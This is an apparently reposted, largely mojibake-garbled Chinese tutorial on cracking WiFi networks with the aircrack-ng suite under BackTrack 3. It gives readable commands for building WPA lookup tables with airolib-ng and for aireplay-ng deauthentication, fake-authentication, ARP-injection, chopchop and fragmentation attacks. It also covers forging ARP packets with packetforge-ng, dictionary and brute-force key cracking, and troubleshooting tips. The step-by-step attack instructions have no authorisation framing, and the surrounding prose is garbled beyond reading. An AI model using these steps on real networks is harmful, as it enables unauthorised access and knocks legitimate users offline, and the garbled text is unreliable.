æ¥è°ç¨è¿æ ·çæ件è¿è¡æ¯å¯¹ï¼ç ´è§£æçå°±å¯ä»¥å¤§å¹ æé«ã
å 讲éè¿airolibæ建WPA table
WPA tableå ·æè¾å¼ºçé对ssidçç¹æ§ã
1. å¨æ建WPA tableä¹åéè¦åå¤ä¸¤ä¸ªæ件ï¼ä¸ä¸ªæ¯ssidå表çæ件ssid.txtï¼ä¸ä¸ªæ¯åå ¸æ件
password.txtãä¸å¾ä¸ºæçæ件
大家å¯ä»¥çå°ä¸¤ä¸ªtxtçæ件ï¼ssidè®°äºæ¬éæ¯ssidçå表ï¼ä½ å¯ä»¥å¢å 常è§çssidè¿å»ï¼åé¢çpasswrod
å°±æ¯åå ¸æ件äºã
2. æè¿ssid.txtåpassword.txtè¿æä¸é¢æå°çæ¡æå 123.capè¿ä¸ä¸ªæ件æ·è´å°rootç®å½ä¸æ¹ä¾¿ä½¿ç¨ã
è§ä¸å¾
3.å¼å§å©ç¨airolib-ngæ¥æ建WPA tableäºãæ建wpa tableä¿åçåå为wpahashï¼ä¸åï¼
第ä¸æ¥ï¼å¦ä¸å¾
airolib-ng wpa --import essid ssid.txt
ä¸å½æ 线论åä¸å«åºå
AnywhereWLAN!! 31
第äºæ¥ï¼å¦ä¸å¾
airolib-ng wpa --import passwd password.txt
第ä¸æ¥ï¼å¦ä¸å¾
airolib-ng wpa --clean all
第åæ¥ï¼å¦ä¸å¾
airolib-ng wpa --batch
注ï¼è¿ä¸æ¥è¦çå¾ä¹ ï¼è§åå ¸å¤§å°èå®ï¼æ256Kçåå ¸çäºæ15åéï¼
4. ç¨aircrackæ¥å©ç¨WPA tableè¿è¡ç ´è§£
Aircrack-ng âr wpahash 123.cap
éæ©1以åå°å¼å§ç ´è§£ã
ä¸å½æ 线论åä¸å«åºå
AnywhereWLAN!! 32
æåç ´è§£å°å¦ä¸å¾æ示
ä»ä¸å¾ä¸å¯ä»¥çåºèæ¶00:00:00åæ£ä¸è¶ è¿1ç§éï¼é度42250.00K/S
大家ä¹çå°äºä¸ç§ç ´è§£æ¹å¼ï¼ç´æ¥æåå ¸ä¸å¨winä¸ç¨WinAircrackç ´è§£æ¯é度æ¯å¨BT3ä¸è¦å¿«ãç´æ¥æåå ¸
ç ´è§£ä¸è¶ è¿1åéå°±ç ´åºäºå¯ç ï¼å©ç¨WPA tableç ´è§£é度è½ç¶ä¸å°ä¸ç§ï¼ä½æ¯æ建WPA tableå´èè´¹äº15å
éãæ建WPA tableæ¯å¾èæ¶çï¼ä½æ¯æ建åºäºå æ¬å¸¸è§ssidçåç¸å¯¹è¾å¤§åå ¸çWPA tableçè¯ï¼ä»¥åç ´
解çé度å°å¤§å¤§éä½ãå½ç¶æ²¡æä¸è½çåå ¸ï¼å¦ææä¸è½çåå ¸ï¼åæ建åºä¸ä¸ªå¸¸è§ssidçWPA tableçè¯
é£è¿ä¸ªé¢è¿ç®æ°æ®åºæ¯è¶ çº§è¶ çº§åºå¤§çã
注ï¼WINå¹³å°ä¸çCAIN软件ä¸çç ´è§£å¨ä¹å¯ç¨äºWEPåWPAçåºäºæ´åååå ¸çç ´è§£ï¼ä½æ¯å ¶ç ´è§£é度å¾æ ¢ï¼
ç¸æ¯aircrack-ngèè¨ä¸å ·å®ç¨ä»·å¼ã
ä¸å½æ 线论åä¸å«åºå
AnywhereWLAN!! 33
Aireplay-ngç6ç§æ»å»æ¨¡å¼è¯¦è§£
-0 Deautenticate å²çªæ¨¡å¼
使已ç»è¿æ¥çåæ³å®¢æ·ç«¯å¼ºå¶æå¼ä¸è·¯ç±ç«¯çè¿æ¥ï¼ä½¿å ¶éæ°è¿æ¥ãå¨éæ°è¿æ¥è¿ç¨ä¸è·å¾éªè¯æ°æ®å ï¼
ä»è产çææARP requestã
å¦æä¸ä¸ªå®¢æ·ç«¯è¿å¨è·¯ç±ç«¯ä¸ï¼ä½æ¯æ²¡æ人ä¸ç½ä»¥äº§çæææ°æ®ï¼æ¤æ¶ï¼å³ä½¿ç¨-3 ä¹æ æ³äº§çææARP
requestãæ以æ¤æ¶éè¦ç¨-0 æ»å»æ¨¡å¼é åï¼-3 æ»å»æä¼è¢«ç«å»æ¿æ´»ã
aireplay-ng -0 10 âa <ap mac> -c <my mac> wifi0
åæ°è¯´æï¼
ã-0ãï¼å²çªæ»å»æ¨¡å¼ï¼åé¢è·åé次æ°ï¼è®¾ç½®ä¸º0ï¼å为循ç¯æ»å»ï¼ä¸åçæå¼è¿æ¥ï¼å®¢æ·ç«¯æ æ³æ£å¸¸ä¸
ç½ï¼
ã-aãï¼è®¾ç½®apçmac
ã-cãï¼è®¾ç½®å·²è¿æ¥çåæ³å®¢æ·ç«¯çmacãå¦æä¸è®¾ç½®-cï¼åæå¼ææåapè¿æ¥çåæ³å®¢æ·ç«¯ã
aireplay-ng -3 -b <ap mac> -h <my mac> wifi0
注ï¼ä½¿ç¨æ¤æ»å»æ¨¡å¼çåææ¯å¿ é¡»æéè¿è®¤è¯çåæ³ç客æ·ç«¯è¿æ¥å°è·¯ç±å¨
-1 fakeauth count ä¼ªè£ å®¢æ·ç«¯è¿æ¥
è¿ç§æ¨¡å¼æ¯ä¼ªè£ ä¸ä¸ªå®¢æ·ç«¯åAPè¿è¡è¿æ¥ã
è¿æ¥æ¯æ 客æ·ç«¯çç ´è§£ç第ä¸æ¥ï¼å 为æ¯æ åæ³è¿æ¥ç客æ·ç«¯ï¼å æ¤éè¦ä¸ä¸ªä¼ªè£ 客æ·ç«¯æ¥åè·¯ç±å¨ç¸è¿ã
为让APæ¥åæ°æ®å ï¼å¿ 须使èªå·±çç½å¡åAPå ³èãå¦æ没æå ³èçè¯ï¼ç®æ APå°å¿½ç¥ææä»ä½ ç½å¡å
éçæ°æ®å ï¼IVS æ°æ®å°ä¸ä¼äº§çãç¨-1 ä¼ªè£ å®¢æ·ç«¯æåè¿æ¥ä»¥åæè½åéæ³¨å ¥å½ä»¤ï¼è®©è·¯ç±å¨æ¥åå°æ³¨
å ¥å½ä»¤åæå¯åé¦æ°æ®ä»è产çARPå ã
aireplay-ng -1 0 âe <ap essid> -a <ap mac> -h <my mac> wifi0
åæ°è¯´æï¼
ã-1ãï¼ä¼ªè£ 客æ·ç«¯è¿æ¥æ¨¡å¼ï¼åé¢è·å»¶æ¶
ã-eãï¼è®¾ç½®apçessid
ã-aãï¼è®¾ç½®apçmac
ã-hãï¼è®¾ç½®ä¼ªè£ 客æ·ç«¯çç½å¡MACï¼å³èªå·±ç½å¡macï¼
-2 Interactive 交äºæ¨¡å¼
è¿ç§æ»å»æ¨¡å¼æ¯ä¸ä¸ªæå åææ°æ®åæ»å»å ï¼ä¸ç§éåä¸èµ·ç模å¼
1ï¼è¿ç§æ¨¡å¼ä¸»è¦ç¨äºç ´è§£æ 客æ·ç«¯ï¼å ç¨-1建ç«èå客æ·ç«¯è¿æ¥ç¶åç´æ¥åå æ»å»
aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b <ap mac> -h <my mac> wifi0
åæ°è¯´æï¼
ã-2ãï¼äº¤äºæ»å»æ¨¡å¼
ã-pã设置æ§å¶å¸§ä¸å å«çä¿¡æ¯ï¼16è¿å¶ï¼ï¼é»è®¤éç¨0841
ã-cã设置ç®æ macå°å
ã-bã设置apçmacå°å
ã-hãè®¾ç½®ä¼ªè£ å®¢æ·ç«¯çç½å¡MACï¼å³èªå·±ç½å¡macï¼
2ï¼æåå ï¼åéæ³¨å ¥æ°æ®å
aireplay-ng -2 âr <file> -x 1024 wifi0
åå æ»å».å ¶ä¸ï¼-x 1024 æ¯éå®åå é度ï¼é¿å ç½å¡æ»æºï¼å¯ä»¥éæ©1024ã
ä¸å½æ 线论åä¸å«åºå
AnywhereWLAN!! 34
-3 ARP-request æ³¨å ¥æ»å»æ¨¡å¼
è¿ç§æ¨¡å¼æ¯ä¸ç§æå ååæéåçè¿ç¨
è¿ç§æ»å»æ¨¡å¼å¾ææãæ¢å¯ä»¥å©ç¨åæ³å®¢æ·ç«¯ï¼ä¹å¯ä»¥é å-1 å©ç¨èæè¿æ¥çä¼ªè£ å®¢æ·ç«¯ãå¦ææåæ³å®¢
æ·ç«¯é£ä¸è¬éè¦çå åéï¼è®©åæ³å®¢æ·ç«¯åap ä¹é´éä¿¡ï¼å°éæ°æ®å°±å¯äº§çææARP request æå¯å©ç¨-3
模å¼æ³¨å ¥æåãå¦æ没æä»»ä½éä¿¡åå¨ï¼ä¸è½å¾å°ARP request.ï¼åè¿ç§æ»å»å°±ä¼å¤±è´¥ãå¦æåæ³å®¢æ·ç«¯å
apä¹é´é¿æ¶é´å 没æARP requestï¼å¯ä»¥å°è¯åæ¶ä½¿ç¨-0 æ»å»ã
å¦æ没æåæ³å®¢æ·ç«¯ï¼åå¯ä»¥å©ç¨-1 建ç«èæè¿æ¥çä¼ªè£ å®¢æ·ç«¯ï¼è¿æ¥è¿ç¨ä¸è·å¾éªè¯æ°æ®å ï¼ä»è产ç
ææARP requestãåéè¿-3 模å¼æ³¨å ¥ã
aireplay-ng -3 -b <ap mac> -h <my mac> -x 512 wifi0
åæ°è¯´æï¼
ã-3ãï¼arpæ³¨å ¥æ»å»æ¨¡å¼
ã-bãï¼è®¾ç½®apçmac
ã-hãï¼è®¾ç½®
ã-xãï¼å®ä¹æ¯ç§åéæ°æ®æ·å çæ°éï¼ä½æ¯æé«ä¸è¶ è¿1024ï¼å»ºè®®ä½¿ç¨512ï¼ä¹å¯ä¸å®ä¹ï¼
-4 Chopchop æ»å»æ¨¡å¼ï¼ç¨ä»¥è·å¾ä¸ä¸ªå å«å¯é¥æ°æ®çxor æ件
è¿ç§æ¨¡å¼ä¸»è¦æ¯è·å¾ä¸ä¸ªå¯å©ç¨å å«å¯é¥æ°æ®çxor æ件ï¼ä¸è½ç¨æ¥è§£å¯æ°æ®å ãèæ¯ç¨å®æ¥äº§çä¸ä¸ªæ°
çæ°æ®å 以便æ们å¯ä»¥è¿è¡æ³¨å ¥ã
aireplay-ng -4 -b <ap mac> -h <my mac> wifi0
åæ°è¯´æï¼
-bï¼è®¾ç½®éè¦ç ´è§£çAPçmac
-hï¼è®¾ç½®èæä¼ªè£ è¿æ¥çmacï¼å³èªå·±ç½å¡çmacï¼
-5 fragment ç¢çå æ»å»æ¨¡å¼ç¨ä»¥è·å¾PRGA(å å«å¯é¥çåç¼ä¸ºxor çæ件)
è¿ç§æ¨¡å¼ä¸»è¦æ¯è·å¾ä¸ä¸ªå¯å©ç¨PRGAï¼è¿éçPRGA 并ä¸æ¯wep keyæ°æ®ï¼ä¸è½ç¨æ¥è§£å¯æ°æ®å ãèæ¯
ç¨å®æ¥äº§çä¸ä¸ªæ°çæ°æ®å 以便æ们å¯ä»¥è¿è¡æ³¨å ¥ãå ¶å·¥ä½åçå°±æ¯ä½¿ç®æ APéæ°å¹¿æå ï¼å½APé广æ
æ¶ï¼ä¸ä¸ªæ°çIVSå°äº§çï¼æ们就æ¯å©ç¨è¿ä¸ªæ¥ç ´è§£
aireplay-ng -5 -b <ap mac> -h <my mac> wifi0
ã-5ãï¼ç¢çå æ»å»æ¨¡å¼
ã-bãï¼è®¾ç½®apçmac
ã-hãï¼è®¾ç½®èæä¼ªè£ è¿æ¥çmacï¼å³èªå·±ç½å¡çmacï¼
ä¸å½æ 线论åä¸å«åºå
AnywhereWLAN!! 35
Packetforge-ngï¼æ°æ®å å¶é ç¨åº
Packetforge-ng <mode> <options>
Mode
ã-0ãï¼ä¼ªé ARPå
packetforge-ng -0 -a <ap mac> -h <my mac> wifi0 âk 255.255.255.255 -l 255.255.255.255
ây<.xor file> -w mrarp
åæ°è¯´æï¼
ã-0ãï¼ä¼ªè£ arpæ°æ®å
ã-aãï¼è®¾ç½®apçmac
ã-hã设置èæä¼ªè£ è¿æ¥çmacï¼å³èªå·±çmacï¼
ã-kã<ip[:port]>说æï¼è®¾ç½®ç®æ æ件IPå端å£
ã-lã<ip[:port]>说æï¼è®¾ç½®æºæ件IPå端å£
ã-yã<file>说æï¼ä»xor æ件ä¸è¯»åPRGAãåé¢è·xor çæ件åã
ã-wãè®¾ç½®ä¼ªè£ çarpå çæ件å
Aircrack-ngï¼WEP åWPA-PSK key ç ´è§£ä¸»ç¨åº
Aircrack-ng [optin] <.cap/.ivs file>
Optin
aircrack-ng -n 64 -b <ap mac> name-01.ivs
åæ°è¯´æï¼
ã-nãï¼è®¾ç½®WEP KEY é¿åº¦ï¼64/128/152/256/512ï¼
aircrack-ng -x -f 2 name-01h.cap
åæ°è¯´æï¼
ã-xãï¼è®¾ç½®ä¸ºæ´åç ´è§£æ¨¡å¼
ã-fãï¼è®¾ç½®å¤æç¨åº¦ï¼wepå¯ç 设置为1ï¼wpa å¯ç 设置为2
aircrack-ng -w password.txt ciw.cap
ã-wãï¼è®¾ç½®ä¸ºåå ¸ç ´è§£æ¨¡å¼ï¼åé¢è·åå ¸æ件ï¼ååé¢è·æ¯æ们å³æ¶ä¿åçé£ä¸ªæè·å°WPA éªè¯çæå
æ件ã
ä¸å½æ 线论åä¸å«åºå
AnywhereWLAN!! 36
常è§é®é¢èè
é®é¢1ï¼æå¨å¯å¨bt3 çæ¶åï¼è¾å ¥startxé»å±
解çï¼å¨è¾å ¥ç¨æ·åroot åå¯ç toor 以åè¾å ¥xconf è¿æ¶ä¼é»å±ä¸ä¼ï¼ç¶ååºæ¥æ示符åè¾å ¥startx å¯è¿å ¥
winçªå£ï¼å½å®å¨ä¸è½è¿å ¥winçªå£çæ¶åä½ ä¹å¯ä»¥ç´æ¥å¨æ示符ä¸è¾å ¥åç ´è§£å½ä»¤ï¼åæ¶å¯ç¨alt+f1 æå¼
ä¸ä¸ªshellï¼alt+f2 æå¼ç¬¬äºä¸ªshellï¼alt+f3 æå¼ç¬¬ä¸ä¸ªçãå ³éçªå£ç¨PRINT SCREEN é®
é®é¢2ï¼å¨BT3ä¸æå¼kismet çæ¶åçªå£ä¸éªå°±æ²¡äºã
解çï¼é¦å å 载驱ifconfig -a rausb0 å¼å§ç½å¡çå¬:airmon-ng start rausb0ãæ¾å°/usr/local/etc/kismet.conf
æå¼æ¤æ件å¨channelsplit=trueä¸é¢å å ¥ä¸è¡source=rt2500,rausb0,monitor
æ³¨ï¼ wusb54g v4ä¸å®æ¯rt2500 ,ä¸æ¯å 载驱å¨æ¶æ¾ç¤ºçrt2570ã
3945 çå å¼å å ¥source=ipw3945,eth0,IPW3945
温馨提示:答案为网友推荐,仅供参考